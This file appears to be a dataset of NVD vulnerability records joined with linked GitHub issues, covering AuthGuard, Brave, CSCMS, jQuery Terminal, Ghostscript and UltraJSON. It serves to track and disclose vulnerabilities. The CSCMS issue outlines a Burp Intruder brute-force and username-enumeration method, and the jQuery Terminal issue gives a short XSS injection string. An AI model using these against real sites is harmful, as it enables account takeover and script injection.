[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/commit/9783b1143da6576028de23e15a1f198b1f937b82" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/compare/v0.8.0...v0.9.0" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/issues/166" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/pull/181" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/commit/9783b1143da6576028de23e15a1f198b1f937b82" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/compare/v0.8.0...v0.9.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/issues/166" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/AuthGuard/AuthGuard/pull/181" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:authguard_project:authguard:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCDA41B2-8D24-4D67-8F20-0D97D4409E90", "versionEndExcluding": "0.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/AuthGuard/AuthGuard/issues/166
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "AuthGuard", "AuthGuard" ]
null
Authentication ignores inactive identifiers
https://api.github.com/repos/AuthGuard/AuthGuard/issues/166/comments
0
2021-08-23T19:06:49Z
2021-10-08T20:41:55Z
https://github.com/AuthGuard/AuthGuard/issues/166
977,335,169
166
2,926
CVE-2021-45884
2021-12-27T22:15:07.847
In Brave Desktop 1.17 through 1.33 before 1.33.106, when CNAME-based adblocking and a proxying extension with a SOCKS fallback are enabled, additional DNS requests are issued outside of the proxying extension using the system's DNS settings, resulting in information disclosure. NOTE: this issue exists because of an incomplete fix for CVE-2021-21323 and CVE-2021-22916.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/19070" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/20079" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-core/pull/10742" }, { "source": "cve@mitre.org", "tags": [ "Permissions Required" ], "url": "https://hackerone.com/reports/1377864" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/19070" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/20079" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-core/pull/10742" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://hackerone.com/reports/1377864" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:brave:brave:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D18AD5E-AE64-4719-82F2-6A5ED9C913C8", "versionEndExcluding": null, "versionEndIncluding": "1.33.106", "versionStartExcluding": null, "versionStartIncluding": "1.17.1", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "200" ]
200
https://github.com/brave/brave-browser/issues/19070
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "brave", "brave-browser" ]
https://hackerone.com/reports/1377864
hackerone #1377864 - CNAME Uncloacking in SOCKS5 protocol
https://api.github.com/repos/brave/brave-browser/issues/19070/comments
9
2021-10-28T16:16:06Z
2021-12-13T17:11:52Z
https://github.com/brave/brave-browser/issues/19070
1,038,700,556
19,070
2,927
CVE-2021-45884
2021-12-27T22:15:07.847
In Brave Desktop 1.17 through 1.33 before 1.33.106, when CNAME-based adblocking and a proxying extension with a SOCKS fallback are enabled, additional DNS requests are issued outside of the proxying extension using the system's DNS settings, resulting in information disclosure. NOTE: this issue exists because of an incomplete fix for CVE-2021-21323 and CVE-2021-22916.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/19070" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/20079" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-core/pull/10742" }, { "source": "cve@mitre.org", "tags": [ "Permissions Required" ], "url": "https://hackerone.com/reports/1377864" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/19070" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/brave/brave-browser/issues/20079" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/brave/brave-core/pull/10742" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://hackerone.com/reports/1377864" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:brave:brave:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D18AD5E-AE64-4719-82F2-6A5ED9C913C8", "versionEndExcluding": null, "versionEndIncluding": "1.33.106", "versionStartExcluding": null, "versionStartIncluding": "1.17.1", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "200" ]
200
https://github.com/brave/brave-browser/issues/20079
[ "Issue Tracking", "Release Notes", "Third Party Advisory" ]
github.com
[ "brave", "brave-browser" ]
### Release Notes - Upgrade from Chromium 96.0.4664.93 to Chromium 96.0.4664.110. ([#20077](https://github.com/brave/brave-browser/issues/20077)) - Improve formatting of input values (send and swap). ([#19855](https://github.com/brave/brave-browser/issues/19855)) - Full Fiat Balance not showing with ERC721 tokens. ([#19725](https://github.com/brave/brave-browser/issues/19725)) - Update default widget list for desktop. ([#19708](https://github.com/brave/brave-browser/issues/19708)) - it is possible to delete the active network on brave://settings/wallet/networks. ([#19678](https://github.com/brave/brave-browser/issues/19678)) - Changes to sync QR code. ([#19550](https://github.com/brave/brave-browser/issues/19550)) - Make ConnectHW screen working on both Trezor/Ledger devices. ([#19495](https://github.com/brave/brave-browser/issues/19495)) - Double click by Confirm/Sign buttons for Trezor transactions closes wallet panel. ([#19490](https://github.com/brave/brave-browser/issues/19490)) - We aren’t displaying asset balances until we get prices for them, we should. ([#19407](https://github.com/brave/brave-browser/issues/19407)) - Don't treat unknown balances as 0, show N/A instead. ([#19404](https://github.com/brave/brave-browser/issues/19404)) - Make the front end use the default currency and default cryptocurrency from settings. ([#19234](https://github.com/brave/brave-browser/issues/19234)) - Link for IPFS preference settings page is hidden for some window sizes. ([#19221](https://github.com/brave/brave-browser/issues/19221)) - Update NTP Background Images component for Fall 2021 wallpapers on desktop. ([#19129](https://github.com/brave/brave-browser/issues/19129)) - hackerone #1377864 - CNAME Uncloacking in SOCKS5 protocol. ([#19070](https://github.com/brave/brave-browser/issues/19070)) - Brave reading /etc/chromium/policies. ([#19052](https://github.com/brave/brave-browser/issues/19052)) - Add menu to allow to edit/remove networks on wallet page. ([#19004](https://github.com/brave/brave-browser/issues/19004)) - Allow folks to enable File System API with a Flag. ([#18979](https://github.com/brave/brave-browser/issues/18979)) - Clicking Solve on adaptive captcha Brave Ads paused modal sometimes yields no action. ([#18858](https://github.com/brave/brave-browser/issues/18858)) - Add Google's new iOS URL parameters to the query string filter. ([#18758](https://github.com/brave/brave-browser/issues/18758)) - Implement eth_signTypedData and in particular eth_signTypedData_v4 version of EIP-712. ([#18659](https://github.com/brave/brave-browser/issues/18659)) - Implement Rewards settings section inside brave://settings. ([#18158](https://github.com/brave/brave-browser/issues/18158)) - [hackerone] Strip referrer and origin in cross-origin requests from a .onion origin. ([#18071](https://github.com/brave/brave-browser/issues/18071)) - Re-enable the post uninstall survey on Windows. ([#18063](https://github.com/brave/brave-browser/issues/18063)) - Implement new Rewards NTP Widget v2 design . ([#17483](https://github.com/brave/brave-browser/issues/17483)) - Use error modals in Brave Rewards settings page instead of error notifications for linking-related errors (convert these notifications to error modals). ([#16652](https://github.com/brave/brave-browser/issues/16652)) - Unable to go backwards on IPFS pages when automatic DNSLink redirection is enabled. ([#16557](https://github.com/brave/brave-browser/issues/16557))
[Desktop] Release notes for `1.33.x - Release`
https://api.github.com/repos/brave/brave-browser/issues/20079/comments
0
2021-12-13T20:42:44Z
2021-12-14T21:00:24Z
https://github.com/brave/brave-browser/issues/20079
1,078,997,214
20,079
2,928
CVE-2020-21238
2021-12-27T23:15:08.080
An issue in the user login box of CSCMS v4.0 allows attackers to hijack user accounts via brute force attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chshcms:cscms:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1322E111-92FB-4A3C-9CCC-60007621AA49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "307" ]
307
https://github.com/chshcms/cscms/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chshcms", "cscms" ]
cscmsV4.0-4.1 demourl:http://demo.chshcms.com/ In the user login box Sign in now without a verification code and prompt that the user does not exist,which makes it easier for remote attackers to hijack accounts via a brute-force approach. Capture the packet in burp to truncate the current request the current data packet sent to the intruder module, identification "username" used to traverse account information; Select the dictionary for the account name to open the attack ![image](https://user-images.githubusercontent.com/57421706/68908827-6b46c180-0787-11ea-8b60-494915a9953a.png) Successful login account ![image](https://user-images.githubusercontent.com/57421706/68908860-831e4580-0787-11ea-9ab4-4b391ed5fbd7.png) This is a prompt password error ![image](https://user-images.githubusercontent.com/57421706/68908984-d42e3980-0787-11ea-928b-07ba5cd1cd0f.png) This is the prompt that the account does not exist. ![image](https://user-images.githubusercontent.com/57421706/68909051-063f9b80-0788-11ea-88ef-81eae7111a5f.png)
cscms demourl:http://demo.chshcms.com/ login have UserTraversal-Vulnerability
https://api.github.com/repos/chshcms/cscms/issues/5/comments
0
2019-11-15T01:15:46Z
2019-11-15T01:15:46Z
https://github.com/chshcms/cscms/issues/5
523,197,305
5
2,929
CVE-2021-43862
2021-12-30T15:15:07.470
jQuery Terminal Emulator is a plugin for creating command line interpreters in your applications. Versions prior to 2.31.1 contain a low impact and limited cross-site scripting (XSS) vulnerability. The code for XSS payload is always visible, but an attacker can use other techniques to hide the code the victim sees. If the application uses the `execHash` option and executes code from URL, the attacker can use this URL to execute their code. The scope is limited because the javascript attribute used is added to span tag, so no automatic execution like with `onerror` on images is possible. This issue is fixed in version 2.31.1. As a workaround, the user can use formatting that wrap whole user input and its no op. The code for this workaround is available in the GitHub Security Advisory. The fix will only work when user of the library is not using different formatters (e.g. to highlight code in different way).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 2.5, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/commit/77eb044d0896e990d48a9157f0bc6648f81a84b5" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/issues/727" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/releases/tag/2.31.1" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/security/advisories/GHSA-x9r5-jxvq-4387" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/commit/77eb044d0896e990d48a9157f0bc6648f81a84b5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/issues/727" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/releases/tag/2.31.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jcubic/jquery.terminal/security/advisories/GHSA-x9r5-jxvq-4387" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jquery.terminal_project:jquery.terminal:*:*:*:*:*:*:*:*", "matchCriteriaId": "199BA80C-8DDB-4FC3-AC04-5DDB7FD2ACCA", "versionEndExcluding": "2.31.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jcubic/jquery.terminal/issues/727
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jcubic", "jquery.terminal" ]
Self XSS is possible by typing something like "onclick="alert(1);" I think it's because data-text doesn't contain sanitized characters. Don't think it's critical but there you go regardless :)
Self XSS
https://api.github.com/repos/jcubic/jquery.terminal/issues/727/comments
3
2021-12-28T20:03:48Z
2021-12-30T13:11:00Z
https://github.com/jcubic/jquery.terminal/issues/727
1,090,101,891
727
2,930
CVE-2021-45944
2022-01-01T00:15:08.183
Ghostscript GhostPDL 9.50 through 9.53.3 has a use-after-free in sampled_data_sample (called from sampled_data_continue and interp).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=29903" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=30715" }, { "source": "cve@mitre.org", "tags": null, "url": "https://git.ghostscript.com/?p=ghostpdl.git%3Ba=commit%3Bh=7861fcad13c497728189feafb41cd57b5b50ea25" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/ghostscript/OSV-2021-237.yaml" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/google/oss-fuzz-vulns/issues/16" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/01/msg00006.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5038" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=29903" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=30715" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://git.ghostscript.com/?p=ghostpdl.git%3Ba=commit%3Bh=7861fcad13c497728189feafb41cd57b5b50ea25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/ghostscript/OSV-2021-237.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/google/oss-fuzz-vulns/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/01/msg00006.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5038" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:artifex:ghostscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "422A9350-1055-4C93-A976-98F68956E970", "versionEndExcluding": null, "versionEndIncluding": "9.53.3", "versionStartExcluding": null, "versionStartIncluding": "9.50", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/google/oss-fuzz-vulns/issues/16
[ "Issue Tracking" ]
github.com
[ "google", "oss-fuzz-vulns" ]
Hi https://github.com/google/oss-fuzz-vulns/blob/4e587fda3d822ca4e1f5d8d64c78fd909aef59f1/vulns/ghostscript/OSV-2021-237.yaml#L25 references a fixing commit which though only removes a documentation snipped. Unless my bisect done is wrong, then the following should be the fixing commit: https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=7861fcad13c497728189feafb41cd57b5b50ea25 ``` git bisect start '--term-old' 'broken' '--term-new' 'fixed' # broken: [45e765e59a45b46dcb05e8c729689a7c0574a48c] Fix some warnings caused by the gs FS api commit. git bisect broken 45e765e59a45b46dcb05e8c729689a7c0574a48c # fixed: [068172a75a11b6b26e25696eb49241e4ddf4fbc6] Dates and product string for 9.55.0 release git bisect fixed 068172a75a11b6b26e25696eb49241e4ddf4fbc6 # broken: [35f6a9d9e2838069b5ba250cf26d016bc5ad3635] GPDL whitespace fixes. git bisect broken 35f6a9d9e2838069b5ba250cf26d016bc5ad3635 # fixed: [331fcb49b62a615976711cccdd3ff9796152a323] Fix bug 703245: bitmap size exceeds buffer. git bisect fixed 331fcb49b62a615976711cccdd3ff9796152a323 # broken: [3abfca2a925427962ed644872057f75c44afc0d8] Fix memory leak in pcl pdfmark implementation git bisect broken 3abfca2a925427962ed644872057f75c44afc0d8 # broken: [fec1090d129630c23f425c6aae5a4a1308a973da] LGTM: Rejig s_A85E_process for goto's. git bisect broken fec1090d129630c23f425c6aae5a4a1308a973da # broken: [054d35268592bba2434dffdb3b36e4ad224adcf0] Guard against indirect /Length in an XRef stream git bisect broken 054d35268592bba2434dffdb3b36e4ad224adcf0 # broken: [6f6c88f92f98d0f8340c29201c7536ec1a521efd] Sort tifftop.c dependency on jpeg headers git bisect broken 6f6c88f92f98d0f8340c29201c7536ec1a521efd # fixed: [0ca4ae94020a1e3b48c337759ccb9fc0b3af61ec] Bug 702910: Fix mkromfs for THREADSAFE build git bisect fixed 0ca4ae94020a1e3b48c337759ccb9fc0b3af61ec # broken: [b5e44d6709642727ee524cccd2b5ab09f2e48572] oss-fuzz 30795: handle remap_color failure in clist_begin_typed_image git bisect broken b5e44d6709642727ee524cccd2b5ab09f2e48572 # fixed: [180419375973b9ce4664286a67106d712260ef7f] Remove .setpdfwrite from the documentation git bisect fixed 180419375973b9ce4664286a67106d712260ef7f # broken: [ea1624205c8e1ca936bd38a6095a0dd1880e7287] Fix hang condition detected on Windows release build. git bisect broken ea1624205c8e1ca936bd38a6095a0dd1880e7287 # fixed: [7861fcad13c497728189feafb41cd57b5b50ea25] oss-fuzz 30715: Check stack limits after function evaluation. git bisect fixed 7861fcad13c497728189feafb41cd57b5b50ea25 # first fixed commit: [7861fcad13c497728189feafb41cd57b5b50ea25] oss-fuzz 30715: Check stack limits after function evaluation. ```
Fixing commit from OSV-2021-237 seems wrong
https://api.github.com/repos/google/oss-fuzz-vulns/issues/16/comments
2
2022-01-04T20:58:23Z
2022-01-05T05:52:24Z
https://github.com/google/oss-fuzz-vulns/issues/16
1,093,747,732
16
2,931
CVE-2021-45958
2022-01-01T00:15:08.813
UltraJSON (aka ujson) through 5.1.0 has a stack-based buffer overflow in Buffer_AppendIndentUnchecked (called from encode). Exploitation can, for example, use a large amount of indentation.
